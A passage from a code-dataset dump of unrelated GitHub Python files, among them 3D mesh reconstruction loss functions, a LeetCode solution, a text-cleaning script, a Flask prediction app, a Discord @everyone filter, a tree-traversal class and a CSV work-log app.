torch.cat((head_vert_coords, belly_vert_coords, neck_vert_coords, back_vert_coords), dim = 1)\n\n vert2d = self.renderer.project_points(vert_coords, cams)\n\n # Chamfer loss\n nums = self.nums\n head_cdist1, _, _, _ = distChamfer(vert2d[:, :nums[0], :], head_points)\n belly_cdist1, _, _, _ = distChamfer(vert2d[:, nums[0]:nums[1], :], belly_points)\n neck_cdist1, _, _, _ = distChamfer(vert2d[:, nums[1]:nums[2], :], neck_points)\n back_cdist1, _, _, _ = distChamfer(vert2d[:, nums[2]:nums[3], :], back_points)\n\n cdist = torch.cat((head_cdist1 * self.weights[0], belly_cdist1 * self.weights[1], neck_cdist1 * self.weights[2], back_cdist1 * self.weights[3]), dim = 1)\n loss = torch.mean(cdist, dim = 1)\n if(avg):\n return torch.mean(loss), vert2d\n else:\n return loss\n\nclass MultiMaskLoss(nn.Module):\n def __init__(self, image_size = 256, renderer_type = \"softmax\", num_hypo_cams = 8):\n super(MultiMaskLoss, self).__init__()\n self.renderer = SoftRenderer(image_size, renderer_type)\n self.num_hypo_cams = num_hypo_cams\n self.image_size = image_size\n\n def forward(self, vs, fs, cams_all_hypo, cam_probs, masks_gt):\n bs = vs.size(0)\n # prepare vertices, faces, cameras\n pred_vs = vs.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1).view(-1, vs.size(1), 3)\n faces = fs.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1).view(-1, fs.size(1), 3)\n cams_all_hypo_flat = cams_all_hypo.view(-1, 7)\n\n # 
prepare images\n pred, _, _ = self.renderer.forward(pred_vs, faces, cams_all_hypo_flat)\n mask_all_hypo = pred[:, 3, :, :]\n masks = masks_gt.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1).view(-1, self.image_size, self.image_size)\n\n # calculate loss\n loss = neg_iou_loss(mask_all_hypo, masks, avg = False)\n loss = loss.view(bs, -1) * cam_probs\n loss = loss.sum(dim = 1)\n mask_loss = loss.mean()\n\n return mask_loss, mask_all_hypo\n\nclass MultiTextureLoss(nn.Module):\n def __init__(self, samples_per_gpu = 32, num_hypo_cams = 8,\n image_size = 256, renderer_type = \"softmax\", texture_loss_type=\"perceptual\",\n renderer = \"smr\"):\n super(MultiTextureLoss, self).__init__()\n if(renderer in \"smr\"):\n self.renderer = SoftRenderer(image_size, renderer_type)\n else:\n self.renderer = NeuralRenderer(image_size)\n self.renderer.ambient_light_only()\n self.hard_renderer = SoftRenderer(image_size, \"hard\")\n\n if(texture_loss_type in \"perceptual\"):\n self.texture_loss = PerceptualTextureLoss()\n else:\n self.texture_loss = texture_loss_masks\n self.texture_cycle_fn = TexCycle(samples_per_gpu)\n\n self.num_hypo_cams = num_hypo_cams\n self.image_size = image_size\n self.which_renderer = renderer\n\n\n def forward(self, vs, fs, cams_all_hypo, cam_probs, proj_cam, rgbs, masks_gt, masks_pred, tx, tex_flow, dts_barrier):\n bs = vs.size(0)\n # prepare vertices, faces, textures and cameras\n pred_vs = vs.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1).view(-1, vs.size(1), 3)\n faces = fs.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1).view(-1, fs.size(1), 3)\n tex = tx.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1, 1).view(-1, tx.size(1), tx.size(2), 3)\n cams_all_hypo_flat = cams_all_hypo.view(-1, 7)\n\n # prepare images: rendering and GT\n if(self.which_renderer in \"nmr\"):\n tex = tex.view(tex.size(0), tex.size(1), 6, 6, 3).unsqueeze(2).repeat(1, 1, 6, 1, 1, 1)\n texture_rgba = self.renderer.forward(pred_vs.detach(), faces, cams_all_hypo_flat, tex)\n else:\n texture_rgba, _, _ = self.renderer.forward(pred_vs.detach(), faces, cams_all_hypo_flat, tex)\n texture_pred = texture_rgba[:,0:3,:,:]\n imgs = rgbs.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1, 1).view(-1, 3, self.image_size, self.image_size)\n masks_gt = masks_gt.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1).view(-1, self.image_size, self.image_size)\n\n # calculate perceptual loss\n tex_loss = self.texture_loss(texture_pred, imgs, masks_gt, masks_pred, avg = False)\n tex_loss = tex_loss.view(bs, -1)\n tex_loss = tex_loss.to(cam_probs.get_device())\n tex_loss = (tex_loss * cam_probs).sum(dim = 1)\n tex_loss = tex_loss.mean()\n tex_dt_loss = texture_dt_loss(tex_flow, dts_barrier)\n\n # get the visiblility map\n _, p2f_info, aggr_info = self.hard_renderer(vs.detach(), fs, proj_cam.detach())\n aggr_info = aggr_info[:, 1, :, :].view(bs, -1)\n tex_cycle_loss, avg_flow = self.texture_cycle_fn(tex_flow, p2f_info.detach(), aggr_info.detach())\n\n return tex_loss, tex_dt_loss, tex_cycle_loss, texture_pred\n\nclass part_matching_loss(nn.Module):\n def __init__(self, scops_path, uv_sampler, num_sym_faces,\n im_size = 256, batch_size = 32,\n loss_type = 'mse', tex_size=6,\n num_cam = 1):\n super(part_matching_loss, self).__init__()\n\n # load mean semantic uv map\n uv_img = scipy.misc.imread(osp.join(scops_path, \"semantic_seg.png\"))\n uv_img = torch.from_numpy(uv_img).view(1, 1, 128, 256).float()\n uv_img = uv_img.cuda()\n\n tex = torch.nn.functional.grid_sample(uv_img, uv_sampler)\n tex = tex.view(tex.size(0), -1, tex.size(2), 
tex_size, tex_size).permute(0, 2, 3, 4, 1)\n tex_left = tex[:, -num_sym_faces:]\n tex = torch.cat([tex, tex_left], 1)\n tex = tex.view(tex.size(0), tex.size(1), -1, 1).squeeze()\n stex = torch.round(tex)\n\n # to one-hot\n nf, nt = stex.size()\n one_hot = torch.zeros(nf * nt, 5).cuda()\n one_hot.scatter_(1, stex.view(-1, 1).long(), 1)\n stex_one_hot = one_hot.view(1, nf, nt, 5)\n\n # semantic texture for each part, because the renderer can only render\n # 3-channel images, so we renderer each part separately\n self.register_buffer(\"stex1\", stex_one_hot[:, :, :, 1].unsqueeze(-1).repeat(batch_size * num_cam, 1, 1, 3))\n self.register_buffer(\"stex2\", stex_one_hot[:, :, :, 2].unsqueeze(-1).repeat(batch_size * num_cam, 1, 1, 3))\n self.register_buffer(\"stex3\", stex_one_hot[:, :, :, 3].unsqueeze(-1).repeat(batch_size * num_cam, 1, 1, 3))\n self.register_buffer(\"stex4\", stex_one_hot[:, :, :, 4].unsqueeze(-1).repeat(batch_size * num_cam, 1, 1, 3))\n\n self.renderer = SoftRenderer(im_size, \"softmax\")\n self.renderer.ambient_light_only()\n self.kl = nn.KLDivLoss(reduction='batchmean')\n\n # default value for backgrounds\n self.register_buffer(\"proj\", torch.zeros(batch_size * num_cam, 1, 256, 256))\n self.proj[:, 0, :, :] = 0.1\n\n # weights for each parts\n weights = torch.Tensor([0, 5.0, 0.0, 0.0, 5.0]).view(1, 5, 1, 1).cuda()\n self.register_buffer(\"weights\", weights)\n\n self.loss_type = loss_type\n\n def forward(self, verts, faces, cams, part_segs, cam_probs = None, avg = True):\n total_loss = 0\n projs = []\n bs = verts.size(0)\n\n # project each part\n proj1, _, _ = self.renderer(verts, faces, cams, self.stex1[:bs])\n proj1 = torch.mean(proj1[:, 0:3, :, :], dim = 1).unsqueeze(1)\n projs.append(proj1)\n\n proj2, _, _ = self.renderer(verts, faces, cams, self.stex2[:bs])\n proj2 = torch.mean(proj2[:, 0:3, :, :], dim = 1).unsqueeze(1)\n projs.append(proj2)\n\n proj3, _, _ = self.renderer(verts, faces, cams, self.stex3[:bs])\n proj3 = torch.mean(proj3[:, 0:3, :, :], dim = 1).unsqueeze(1)\n projs.append(proj3)\n\n proj4, _, _ = self.renderer(verts, faces, cams, self.stex4[:bs])\n proj4 = torch.mean(proj4[:, 0:3, :, :], dim = 1).unsqueeze(1)\n projs.append(proj4)\n\n proj = torch.cat((self.proj[:bs].detach(), proj1, proj2, proj3, proj4), dim = 1)\n centers_proj = scops_utils.batch_get_centers(nn.Softmax(dim = 1)(proj)[:, 1:, :, :])\n centers_parts = scops_utils.batch_get_centers(nn.Softmax(dim = 1)(part_segs)[:, 1:, :, :])\n\n if(avg):\n loss_lmeqv = torch.nn.functional.mse_loss(centers_proj, centers_parts)\n else:\n loss_lmeqv = torch.nn.functional.mse_loss(centers_proj, centers_parts, reduction = 'none')\n loss_lmeqv = torch.sum(loss_lmeqv, dim = (1, 2)) / (loss_lmeqv.size(1) * loss_lmeqv.size(2))\n loss_lmeqv = loss_lmeqv.view(cam_probs.size())\n loss_lmeqv = loss_lmeqv.to(cam_probs.get_device())\n loss_lmeqv = (loss_lmeqv * cam_probs).sum(dim = 1)\n loss_lmeqv = loss_lmeqv.mean()\n\n if(self.loss_type in 'kld'):\n loss_eqv = self.kl(torch.nn.functional.log_softmax(proj, dim = 1), torch.nn.functional.softmax(part_segs, dim = 1))\n else:\n # normalize each part\n # if scale is really small, the division might cause Nan.\n max_proj, _ = torch.max(proj.view(bs, 5, -1), dim = 2)\n max_proj[max_proj < 1e-5] = 1e-5\n proj_norm = proj / max_proj.view(bs, 5, 1, 1)\n\n max_part, _ = torch.max(part_segs.view(bs, 5, -1), dim = 2)\n max_part[max_part < 1e-5] = 1e-5\n part_norm = part_segs / max_part.view(bs, 5, 1, 1)\n\n if(avg):\n loss_eqv = torch.mean(nn.MSELoss(reduction='none')(proj_norm, 
part_norm) * self.weights)\n else:\n bs, cs, iis, iis = part_norm.size()\n loss_eqv = nn.MSELoss(reduction='none')(proj_norm, part_norm) * self.weights\n loss_eqv = torch.sum(loss_eqv, dim = (1, 2, 3)) / (cs * iis * iis)\n loss_eqv = loss_eqv.view(cam_probs.size())\n loss_eqv = loss_eqv.to(cam_probs.get_device())\n loss_eqv = (loss_eqv * cam_probs).sum(dim = 1)\n loss_eqv = loss_eqv.mean()\n\n total_loss = loss_eqv + loss_lmeqv\n return total_loss / 4.0, projs\n","repo_name":"NVlabs/UMR","sub_path":"nnutils/loss_utils.py","file_name":"loss_utils.py","file_ext":"py","file_size_in_byte":17689,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"6"} +{"seq_id":"5454689411","text":"\"\"\"\nProblem:\n 1528. Shuffle String\nDifficulty:\n Easy\nURL:\n https://leetcode.com/problems/shuffle-string\nTags:\n Array, String\nDate:\n 2022-05-10T14:11:39.888884+08:00\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def restoreString(self, s: str, indices: List[int]) -> str:\n ans = ''\n for i, element in enumerate(indices):\n ans += s[indices.index(i)]\n return ans\n\n\ntests = [\n (\n (\"codeleet\", [4, 5, 6, 7, 0, 2, 1, 3],\n ),\n \"leetcode\",\n ),\n (\n (\"abc\", [0, 1, 2],\n ),\n \"abc\",\n ),\n]\n","repo_name":"s0u0b/leetcode","sub_path":"solutions/a01528_shuffle_string.py","file_name":"a01528_shuffle_string.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7078045230","text":"# CleanText.py\n\nimport collections\nimport re\n\nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \nfrom itertools import tee\n\nimport Category\n\nstopwords = ['','a', 'about', 'above', 'across', 'after', 'afterwards']\nstopwords += ['again', 'against', 'all', 'almost', 'alone', 'along']\nstopwords += ['already', 'also', 'although', 'always', 'am', 'among']\nstopwords += ['amongst', 'amoungst', 'amount', 'an', 'and', 'another']\nstopwords += ['any', 'anyhow', 'anyone', 'anything', 'anyway', 'anywhere']\nstopwords += ['are', 'around', 'as', 'at', 'back', 'be', 'became']\nstopwords += ['because', 'become', 'becomes', 'becoming', 'been']\nstopwords += ['before', 'beforehand', 'behind', 'being', 'below']\nstopwords += ['beside', 'besides', 'best', 'between', 'beyond', 'bill', 'both']\nstopwords += ['bottom', 'but', 'by', 'call', 'can', 'cannot', 'cant']\nstopwords += ['co', 'computer', 'con', 'could', 'couldnt', 'cry', 'de']\nstopwords += ['describe', 'detail', 'did', 'do', 'done', 'down', 'due']\nstopwords += ['during', 'each', 'eg', 'eight', 'either', 'eleven', 'else']\nstopwords += ['elsewhere', 'email','empty', 'enough', 'etc', 'even', 'ever']\nstopwords += ['every', 'everyone', 'everything', 'everywhere', 'except']\nstopwords += ['few', 'fifteen', 'fifty', 'fill', 'find', 'fire', 'first']\nstopwords += ['five', 'for', 'former', 'formerly', 'forty', 'found']\nstopwords += ['four', 'from', 'front', 'full', 'further', 'get', 'give']\nstopwords += ['go', 'had', 'has', 'hasnt', 'have', 'he', 'hello', 'hence', 'her']\nstopwords += ['here', 'hereafter', 'hereby', 'herein', 'hereupon', 'hers']\nstopwords += ['herself', 'him', 'himself', 'his', 'hope','how', 'however']\nstopwords += ['hundred', 'i', 'ie', 'if', 'in', 'inc', 'indeed']\nstopwords += ['interest', 'into', 'introduce', 'is', 'it', 'its', 'itself', 'keep']\nstopwords += ['last', 'latter', 'latterly', 'least', 'less', 'ltd', 'made']\nstopwords += ['many', 'may', 'me', 'meanwhile', 'might', 
'mill', 'mine']\nstopwords += ['more', 'moreover', 'most', 'mostly', 'move', 'much']\nstopwords += ['must', 'my', 'myself', 'name', 'namely', 'neither', 'never']\nstopwords += ['nevertheless', 'next', 'nine', 'no', 'nobody', 'none']\nstopwords += ['noone', 'nor', 'not', 'nothing', 'now', 'nowhere', 'of']\nstopwords += ['off', 'often', 'on','once', 'one', 'only', 'onto', 'or', 'org']\nstopwords += ['other', 'others', 'otherwise', 'our', 'ours', 'ourselves']\nstopwords += ['out', 'over', 'own', 'part', 'per', 'perhaps', 'please']\nstopwords += ['put', 'rather', 're', 's', 'same', 'salesforce','see', 'seem', 'seemed']\nstopwords += ['seeming', 'seems', 'sent', 'serious', 'several', 'she', 'should']\nstopwords += ['show', 'side', 'since', 'sincere', 'six', 'sixty', 'so']\nstopwords += ['some', 'somehow', 'someone', 'something', 'sometime']\nstopwords += ['sometimes', 'somewhere', 'still', 'such', 'system', 'take']\nstopwords += ['ten', 'test','than', 'that', 'the', 'their', 'them', 'themselves']\nstopwords += ['then', 'thence', 'there', 'thereafter', 'thereby']\nstopwords += ['therefore', 'therein', 'thereupon', 'these', 'they']\nstopwords += ['thick', 'thin', 'third', 'this', 'those', 'though', 'three']\nstopwords += ['three', 'through', 'throughout', 'thru', 'thus', 'to']\nstopwords += ['together', 'too', 'top', 'toward', 'towards', 'twelve']\nstopwords += ['twenty', 'two', 'un', 'under', 'until', 'up', 'upon']\nstopwords += ['us', 'very', 'via', 'wanted','was', 'we', 'well', 'were', 'what']\nstopwords += ['whatever', 'when', 'whence', 'whenever', 'where']\nstopwords += ['whereafter', 'whereas', 'whereby', 'wherein', 'whereupon']\nstopwords += ['wherever', 'whether', 'which', 'while', 'whither', 'who']\nstopwords += ['whoever', 'whole', 'whom', 'whose', 'why', 'will', 'with']\nstopwords += ['within', 'without', 'would', 'yet', 'you', 'your']\nstopwords += ['yours', 'yourself', 'yourselves']\n\n\ncategories = []\ncategories.extend(Category.security + Category.cash + Category.alternate)\n\n\ndef wordListToFreqDict(wordlist):\n    wordfreq = [wordlist.count(p) for p in wordlist]\n    wordcatg = [keyCategory(p) for p in wordlist]\n    zip_catg_freq = zip(wordcatg, wordfreq)\n    zip_keyword_catg_freq = zip(wordlist, zip_catg_freq)\n    return dict(zip_keyword_catg_freq)\n\ndef wordFreq(elem):\n    return elem[0][1]\n\ndef sortFreqDict(freqdict):\n    aux = [(freqdict[key], key) for key in freqdict]\n    sortedlist = sorted(aux, key = wordFreq, reverse = True)\n    return sortedlist\n\ndef stripNonAlphaNum(text):\n    import re\n    return re.compile(r'\\W+', re.UNICODE).split(text)\n\ndef removeStopwords(wordlist, stopwords):\n    return [w for w in wordlist if w not in stopwords] \n\ndef keyCategory(key): \n    label = \"\"\n    if Category.alternate.count(key) > 0:\n        label = \"alternate\"\n    elif Category.cash.count(key) > 0:\n        label = \"cash\"\n    elif Category.security.count(key) > 0:\n        label = \"security\"\n    else:\n        label = \"uncategorized\"\n    return label \n\ndef keywordCategory(freqdict):\n    for key in freqdict:\n        label = keyCategory(key[1]) \n\ndef remove_punctuation(text):\n    punctuation2 = '-&'+'®©™€â´‚³©¥ã¼•ž®è±äüöž!@#“§$%^*()î_+€$=¿{”}[]:«;\"»\â¢|<>,.?/~`0123456789'\n    for sign in punctuation2:\n        text = text.replace(sign, \" \")\n    return text\n\ndef findWords(text):\n    words = re.findall('\\w+', text)\n    yield from words 
\n","repo_name":"udianand/CreditSuisseDemo","sub_path":"src/model/CleanText.py","file_name":"CleanText.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16810346826","text":"from flask import Flask, render_template, request #importing the necessary libraries \nimport pickle\nimport numpy as np\napp = Flask(__name__)\n\n\n@app.route('/', methods = [\"GET\", \"POST\"])# this code block is to show the user html page to enter the details to be predicted and the clicking the submit button\ndef hello():\n print(\"Request for index page received as it is\")\n return render_template('index2.html')\n\n@app.route('/predict', methods = ['POST']) #This code block is when the user clicked the submit button details from html page will be received using \"request.form\" and predictio\n #will be done based on the array\ndef prediction():\n if request.method == 'POST':\n product = request.form['product']\n fro = request.form['fro']\n to = request.form['to']\n quantity = request.form['quantity']\n permt = request.form['permt']\n commo = request.form['commo']\n\n data = [[product, fro, to, float(quantity), permt, commo]]\n model = pickle.load(open('revenue.pkl', 'rb'))\n\n prediction = np.array(model.predict(data)[0])\n\n return render_template('result.html', n = prediction)# result will be posted on the prediction page\n\n\nif __name__ == '__main__': #main execution code\n app.run()","repo_name":"santoshreddie/Trucknetics","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73816582906","text":"import re\n\nfrom bot.constants import Guild\nfrom bot.exts.filtering._filter_context import Event, FilterContext\nfrom bot.exts.filtering._filters.filter import UniqueFilter\n\nEVERYONE_PING_RE = re.compile(rf\"@everyone|<@&{Guild.id}>|@here\")\nCODE_BLOCK_RE = re.compile(\n r\"(?P``?)[^`]+?(?P=delim)(?!`+)\" # Inline codeblock\n r\"|```(.+?)```\", # Multiline codeblock\n re.DOTALL | re.MULTILINE\n)\n\n\nclass EveryoneFilter(UniqueFilter):\n \"\"\"Filter messages which contain `@everyone` and `@here` tags outside a codeblock.\"\"\"\n\n name = \"everyone\"\n events = (Event.MESSAGE, Event.MESSAGE_EDIT, Event.SNEKBOX)\n\n async def triggered_on(self, ctx: FilterContext) -> bool:\n \"\"\"Search for the filter's content within a given context.\"\"\"\n # First pass to avoid running re.sub on every message\n if not EVERYONE_PING_RE.search(ctx.content):\n return False\n\n content_without_codeblocks = CODE_BLOCK_RE.sub(\"\", ctx.content)\n return bool(EVERYONE_PING_RE.search(content_without_codeblocks))\n","repo_name":"python-discord/bot","sub_path":"bot/exts/filtering/_filters/unique/everyone.py","file_name":"everyone.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":1206,"dataset":"github-code","pt":"6"} +{"seq_id":"19575244432","text":"class BST:\n def __init__(self,val):\n self.k=val\n self.left = None\n self.right = None\n\nclass Traversal:\n \n def inorder(self,root):\n if root!=None:\n self.inorder(root.left)\n print(root.k,end=' ')\n self.inorder(root.right)\n\n def postorder(self,root):\n if root!=None:\n self.postorder(root.left)\n self.postorder(root.right)\n print(root.k,end=' ')\n\n def preorder(self,root):\n if root!=None:\n print(root.k,end=' ')\n self.preorder(root.left)\n self.preorder(root.right)\n \n def 
levelOrder(self,root):\n        from collections import deque\n        q=deque()\n        q.append(root)\n\n        while len(q)!=0:\n            curr=q.popleft()\n            print(curr.k,end=' ')\n            if curr.left!=None:\n                q.append(curr.left)\n            if curr.right!=None:\n                q.append(curr.right)\n    \n\n#            50\n#           /  \\\n#          /    \\\n#        40      60\n#       /  \\    /  \\\n#     10    48 59    70\n\nroot = BST(50)\n'<------LEFT SUB-TREE------->'\nroot.left = BST(40)\nroot.left.left = BST(10)\nroot.left.right = BST(48)\n\n'<------RIGHT SUB-TREE------->'\nroot.right = BST(60)\nroot.right.left = BST(59)\nroot.right.right = BST(70)\nif __name__=='__main__':\n    tree=Traversal()\n    tree.preorder(root)","repo_name":"iamtusharmukharji/Py_Data_Structrures","sub_path":"BST/BST.py","file_name":"BST.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"16264489269","text":"\"\"\"\nA terminal application for logging what work someone did on a certain day.\nThe data is collected in a CSV document\nAuthor: Zachary Collins\nDate: July, 2018\n\"\"\"\nimport csv\n\nimport os\n\nimport re\n\nimport sys\n\n\n# Creates the csv file if it doesn't exist already\ntry:\n    file = open(\"log.csv\", \"r\")\n    file.close()\nexcept IOError:\n    with open(\"log.csv\", \"w\") as csvfile:\n        fieldnames = ['date', 'title', 'time spent', 'notes']\n        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n        writer.writeheader()\n\n\ndef clear_screen():\n    \"\"\"Clears the contents of the console\"\"\"\n\n    os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef menu():\n    \"\"\"Provides a menu on how to operate the program\"\"\"\n\n    clear_screen()\n    print(\"WORK LOG\")\n    print(\"What would you like to do?\")\n    print(\"a) Add new entry\")\n    print(\"b) Search in existing entries\")\n    print(\"c) Quit the program\")\n\n\ndef run():\n    \"\"\"Runs the core function of the program\"\"\"\n\n    menu()\n    answer = input().lower()\n\n    # Controls menu choice\n    if answer == 'a':\n        add_entry()\n    elif answer == 'b':\n        search()\n    elif answer == 'c':\n        exit()\n\n\ndef add_entry():\n    \"\"\"Adds the entry to the CSV document\"\"\"\n\n    clear_screen()\n\n    # Adds a valid Date\n    date = input(\"Enter the Date \\nPlease use MM/DD/YYYY: \")\n    date = \"\".join(re.findall(r'(\\d{2}/\\d{2}/\\d{4})', date))\n    if len(date) == 0:\n        print(\"Must enter valid date\")\n        input(\"Press ENTER to try again\")\n        return add_entry()\n\n    # Adds a valid title\n    title = input(\"Enter the Title: \")\n    if len(title) == 0:\n        print(\"Must enter a Title\")\n        input(\"Press ENTER to try again\")\n        return add_entry()\n\n    # Adds a valid amount of time\n    try:\n        time_spent = int(input(\"Enter the time spent (minutes): \"))\n    except ValueError:\n        print(\"time spent must be a number\")\n        input(\"Press ENTER to try again\")\n        return add_entry()\n\n    # Adds optional notes\n    notes = input(\"Enter any additional notes (Optional): \")\n\n    with open(\"log.csv\", \"a\") as csvfile:\n        fieldnames = ['date', 'title', 'time spent', 'notes']\n        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n        writer.writerow({\n            'date': date,\n            'title': title,\n            'time spent': time_spent,\n            'notes': notes,\n        })\n\n    input(\"\\nEntry has been added. Press a key to return to menu. 
\")\n run()\n\n\ndef prompt():\n \"\"\"Provides a menu on searching functions\"\"\"\n\n clear_screen()\n print(\"Search Options:\")\n print(\"a) Find by Date\")\n print(\"b) Find by Time Spent\")\n print(\"c) Find by Exact Search\")\n print(\"d) Find by Regex Pattern\")\n\n\ndef search():\n \"\"\"Controls the logic of how the user will seach entries\"\"\"\n\n prompt()\n answer = input().lower()\n\n if answer == 'a':\n find_date()\n elif answer == 'b':\n find_time()\n elif answer == 'c':\n find_exact()\n elif answer == 'd':\n find_regex()\n\n\ndef find_date():\n \"\"\"Prompts the user to enter a valid date,\n allowing the user to choose an entry to view\"\"\"\n\n clear_screen()\n log = []\n dates = []\n\n # Opens CSV and reads the full rows and dates\n with open('log.csv', newline='') as csvfile:\n line_reader = csv.reader(csvfile, delimiter='|')\n rows = list(line_reader)\n fields = str(rows[0])\n for row in rows[1:]:\n log.append(', '.join(row))\n for element in row:\n index = element.find(',')\n dates.append(element[0:index])\n\n # Prints the valid options and lets the user search\n print(\"The following are valid dates: \")\n for date in dates:\n print(date)\n search = input(\"\\nEnter the Date (Must be valid)\\nUse MM/DD/YYYY: \")\n counter = 0\n if search in dates:\n for row in log:\n if search in row:\n break\n counter += 1\n else:\n find_date()\n\n # Provides a list for the user to search through\n answer = 'n'\n while answer != 'v':\n clear_screen()\n print(\"Hit 'n' for next date \\nHit 'v' to view the entries\")\n print(\"\\n\" + dates[counter])\n answer = input()\n if answer == 'n':\n counter += 1\n if counter == len(dates):\n counter = 0\n clear_screen()\n print(\"Here are the entries of that date:\")\n print(fields + \"\\n\")\n count = 1\n for row in log:\n if dates[counter] in row:\n print(\"Entry {}: {}\\n\".format(count, row))\n count += 1\n input(\"Press a key to return to menu: \")\n run()\n\n\ndef find_time():\n \"\"\"Prompts the user to enter a valid time,\n allowing the user to choose an entry to view\"\"\"\n\n clear_screen()\n log = []\n times = []\n\n # Opens CSV and reads the full rows and times\n with open('log.csv', newline='') as csvfile:\n line_reader = csv.reader(csvfile, delimiter='|')\n rows = list(line_reader)\n fields = str(rows[0])\n for row in rows[1:]:\n log.append(', '.join(row))\n for element in row:\n comma1 = element.find(',')\n comma2 = element.find(',', comma1 + 1)\n comma3 = element.find(',', comma2 + 1)\n times.append(element[comma2+1:comma3])\n\n # Prints the valid options and lets the user search\n print(\"The following are valid times: \")\n for time in times:\n print(time + \" minutes\")\n search = input(\"\\nEnter the desired Time (Must be valid, Number only): \")\n counter = 0\n found = False\n for row in log:\n comma1 = row.find(',')\n comma2 = row.find(',', comma1 + 1)\n comma3 = row.find(',', comma2 + 1)\n if search in row[comma2+1:comma3]:\n found = True\n break\n counter += 1\n if not found:\n find_time()\n\n # Provides a list for the user to search through\n answer = 'n'\n while answer != 'v':\n clear_screen()\n print(\"Hit 'n' for next amount of time\\nHit 'v' to view the entries\")\n print(\"\\n\" + times[counter] + \" minutes\")\n answer = input()\n if answer == 'n':\n counter += 1\n if counter == len(times):\n counter = 0\n clear_screen()\n print(\"Here are the entries of that time\")\n print(fields + \"\\n\")\n count = 1\n for row in log:\n comma1 = row.find(',')\n comma2 = row.find(',', comma1 + 1)\n comma3 = row.find(',', 
comma2 + 1)\n if times[counter] in row[comma2+1:comma3]:\n print(\"Entry {}: {}\\n\".format(count, row))\n count += 1\n input(\"Press a key to return to menu: \")\n run()\n\n\ndef find_exact():\n \"\"\"Prompts the user to enter a string to search for,\n providing all entries containing the string\"\"\"\n\n clear_screen()\n log = []\n title_notes = []\n\n # Opens CSV and reads the full rows and times\n with open('log.csv', newline='') as csvfile:\n line_reader = csv.reader(csvfile, delimiter='|')\n rows = list(line_reader)\n fields = str(rows[0])\n for row in rows[1:]:\n log.append(', '.join(row))\n for element in row:\n comma1 = element.find(',')\n comma2 = element.find(',', comma1 + 1)\n comma3 = element.find(',', comma2 + 1)\n title_notes.append(element[comma1+1:comma2] + \" \" +\n element[comma3+1:])\n\n # Prints the valid options and lets the user search\n print(\"The following are valid title/notes: \")\n for entry in title_notes:\n print(entry)\n search = input(\"\\nEnter the string to search for (Must be valid): \")\n if len(search) == 0:\n print(\"Please enter a search string\")\n input(\"Press ENTER to try again\")\n find_exact()\n\n # Provides a list of entries containing the search\n found = []\n count = 0\n for row in title_notes:\n if search in row:\n found.append(count)\n count += 1\n if len(found) == 0:\n answer = input(\"Error: string not in entries\\npress 'ENTER'\")\n find_exact()\n clear_screen()\n print(fields + \"\\n\")\n counter = 1\n for entry in found:\n print(\"Entry {}: {}\\n\".format(counter, log[entry]))\n counter += 1\n input(\"Press a key to return to menu: \")\n run()\n\n\ndef find_regex():\n \"\"\"Prompts the user to enter a Regex to search for,\n provides the entries with that regex\"\"\"\n\n clear_screen()\n log = []\n title_notes = []\n\n # Opens CSV and reads the full rows and times\n with open('log.csv', newline='') as csvfile:\n line_reader = csv.reader(csvfile, delimiter='|')\n rows = list(line_reader)\n fields = str(rows[0])\n for row in rows[1:]:\n log.append(', '.join(row))\n for element in row:\n comma1 = element.find(',')\n comma2 = element.find(',', comma1 + 1)\n comma3 = element.find(',', comma2 + 1)\n title_notes.append(element[comma1+1:comma2] + \" \" +\n element[comma3+1:])\n\n # Lets the user search regex\n regex = input(\"Enter the desired Regular Expression to search for: \")\n count = 0\n found = []\n for row in title_notes:\n line = re.findall(r'{}'.format(regex), row)\n if len(line):\n found.append(count)\n count += 1\n counter = 1\n clear_screen()\n\n # Provides a list of entries containing the Regex\n print(fields + \"\\n\")\n for entry in found:\n print(\"Entry {}: {}\".format(counter, log[entry]))\n print(\"Regex Phrase: {}\".format(\"\".join(re.findall(r'{}'.format(regex),\n log[entry]))))\n counter += 1\n if len(found) == 0:\n print(\"No enties were found with that Regular Expression\")\n input(\"\\nPress a key to return to menu: \")\n run()\n\n\n# Ensures this only runs upon the main method being called.\nif __name__ == \"__main__\":\n run()\n\n","repo_name":"zcollin/TechDegree_Project3","sub_path":"TechDegree Project3/work_log.py","file_name":"work_log.py","file_ext":"py","file_size_in_byte":9985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28997020605","text":"import matplotlib.pyplot as plt\nimport matplotlib as mpl\nmpl.rc('font', family='Times New Roman')\n# mpl.rc('text', color='black')\n\nimport numpy as np\nfrom collections import defaultdict as dd\nfrom 
